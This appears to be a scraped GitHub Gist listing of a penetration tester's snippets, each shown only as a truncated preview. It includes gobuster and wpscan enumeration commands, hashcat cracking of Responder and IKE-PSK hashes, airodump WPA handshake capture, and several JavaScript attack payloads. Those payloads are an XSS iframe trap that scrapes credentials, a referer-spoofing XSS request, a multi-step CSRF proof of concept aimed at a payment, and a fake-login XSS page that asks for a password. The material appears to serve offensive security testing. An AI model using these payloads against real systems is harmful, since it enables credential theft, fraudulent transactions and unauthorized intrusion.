hoodoer
/ gobusterCommands.txt
Last active
March 27, 2024 18:08
Gobuster command line examples, with and without proxy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Using the proxy (burp) can result in rediculously huge project files. You've been warned. | |
| gobuster dir -u https://SOMEURL.com -w /some/word/list.txt -p http://localhost:8080 -k -l | |
| gobuster dir -u https://SOMEURL.com -w /some/word/list.txt -k -l | |
| If you can use --wildcard if it's choking on responses, however if it's sending back 302's for nonexistant, | |
| just change up the accepted status codes: | |
| gobuster dir -u https://SOMNEURL.com -w /som/word/list.txt -k -l -s 200,204,301,307,401,403 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert('Click ok when you\'re ready to enter iframe trap'); | |
| // Example Credential scraper and | |
| // XSS iframe trap. Load from whatever | |
| // page has the reflected/stored XSS vuln | |
| // trap the user in an iframe of the app. | |
| // Frame the login page, and copy out the | |
| // username and password fields. | |
| // @hoodoer |
hoodoer
/ setRefererHeader.js
Last active
January 25, 2024 22:08
Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Save the current URL path to restore after making | |
| // malicious request with faked referer header value | |
| var savedPath = window.location.pathname; | |
| var savedSearch = window.location.search; | |
| // Change URL/History to control the referer header value | |
| // Swap out "/this-is-my-fake-referer-value" to be what you need | |
| window.history.replaceState(null, '', '/this-is-my-fake-referer-value'); | |
| // Send malicious request with faked referer header value |
hoodoer
/ csrfPoc.js
Created
December 10, 2019 09:19
XHR Based multi-step CSRF. CORS policy can block this
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function start() | |
| { | |
| alert("Start?"); | |
| } | |
| function sendRequests() | |
| { | |
| // Setup the payment |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| IKE-PSK: | |
| ./hashcat -m 5300 vpn.psk ../PasswordLists/Top109Million-probable-v2.txt -a 0 -r rules/wtf.rule -O | |
| Responder: | |
| hashcat -m 5600 hashes\hash.txt password_list.txt -o cracked\cracked.txt -O -r rules/best64.rule | |
| example: | |
| ./hashcat -m 5600 hashes.txt ../../VM\ Share/PasswordLists/rockyou.txt -o passwords.txt -O -r rules/best66.rule |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert('Click ok when you\'re ready to enter iframe trap'); | |
| // Example XSS iframe trap. Load from whatever | |
| // page has the reflected/stored XSS vuln | |
| // trap the user in an iframe of the app. | |
| // While they surf around, they stick in your | |
| // iFrame, and you keep their session and your XSS | |
| // payload running. | |
| // @hoodoer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wpscan.rb --url http://yourwebsite.com --enumerate dbe | |
| database exports | |
| wpscan.rb --url http://yourwebsite.com --enumerate cb | |
| config backups | |
| wpscan.rb --url http://yourwebsite.com --enumerate vp | |
| vuln plugins | |
| wpscan.rb --url http://yourwebsite.com --enumerate vt |
hoodoer
/ List of IP Reputation Checking Services.txt
Last active
November 10, 2021 21:23
Online services to check the reputation of your IP address. Most of these are related to sending email.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://whatismyipaddress.com/blacklist-check | |
| https://ipcheck.proofpoint.com/ | |
| https://www.ipvoid.com/ip-blacklist-check/ | |
| https://talosintelligence.com/reputation_center | |
| https://www.cyren.com/security-center/cyren-ip-reputation-check |
hoodoer
/ betterXssBackgroundImage.txt
Last active
June 2, 2021 15:24
Simple reflected XSS trick to blank page, set background image (such as an appropriate application page), and prompt user. Great on XSS on messy pages, can make it look like a login page quickly for a screenshot.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <script> | |
| // Fake the application with a screenshot | |
| document.body.outerHTML = ''; | |
| document.body.innerHTML = ''; | |
| document.body.style.backgroundImage = "url('http://localhost:80/background.png')"; | |
| document.body.style.backgroundRepeat = "no-repeat"; | |
| // Ask user to re-enter their password |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| airmon-ng check kill | |
| https://forums.hak5.org/topic/37247-capturing-wpawpa2-passwords-with-the-nanotetra/ | |
| On nano, or other wifi access point monitoring: | |
| airmon-ng start wlan1 | |
| airodump-ng -w PacketCapture wlan1mon | |
| (Then just do near the AP you're wanting to crack and wait for someone to connect to it.) |
NewerOlder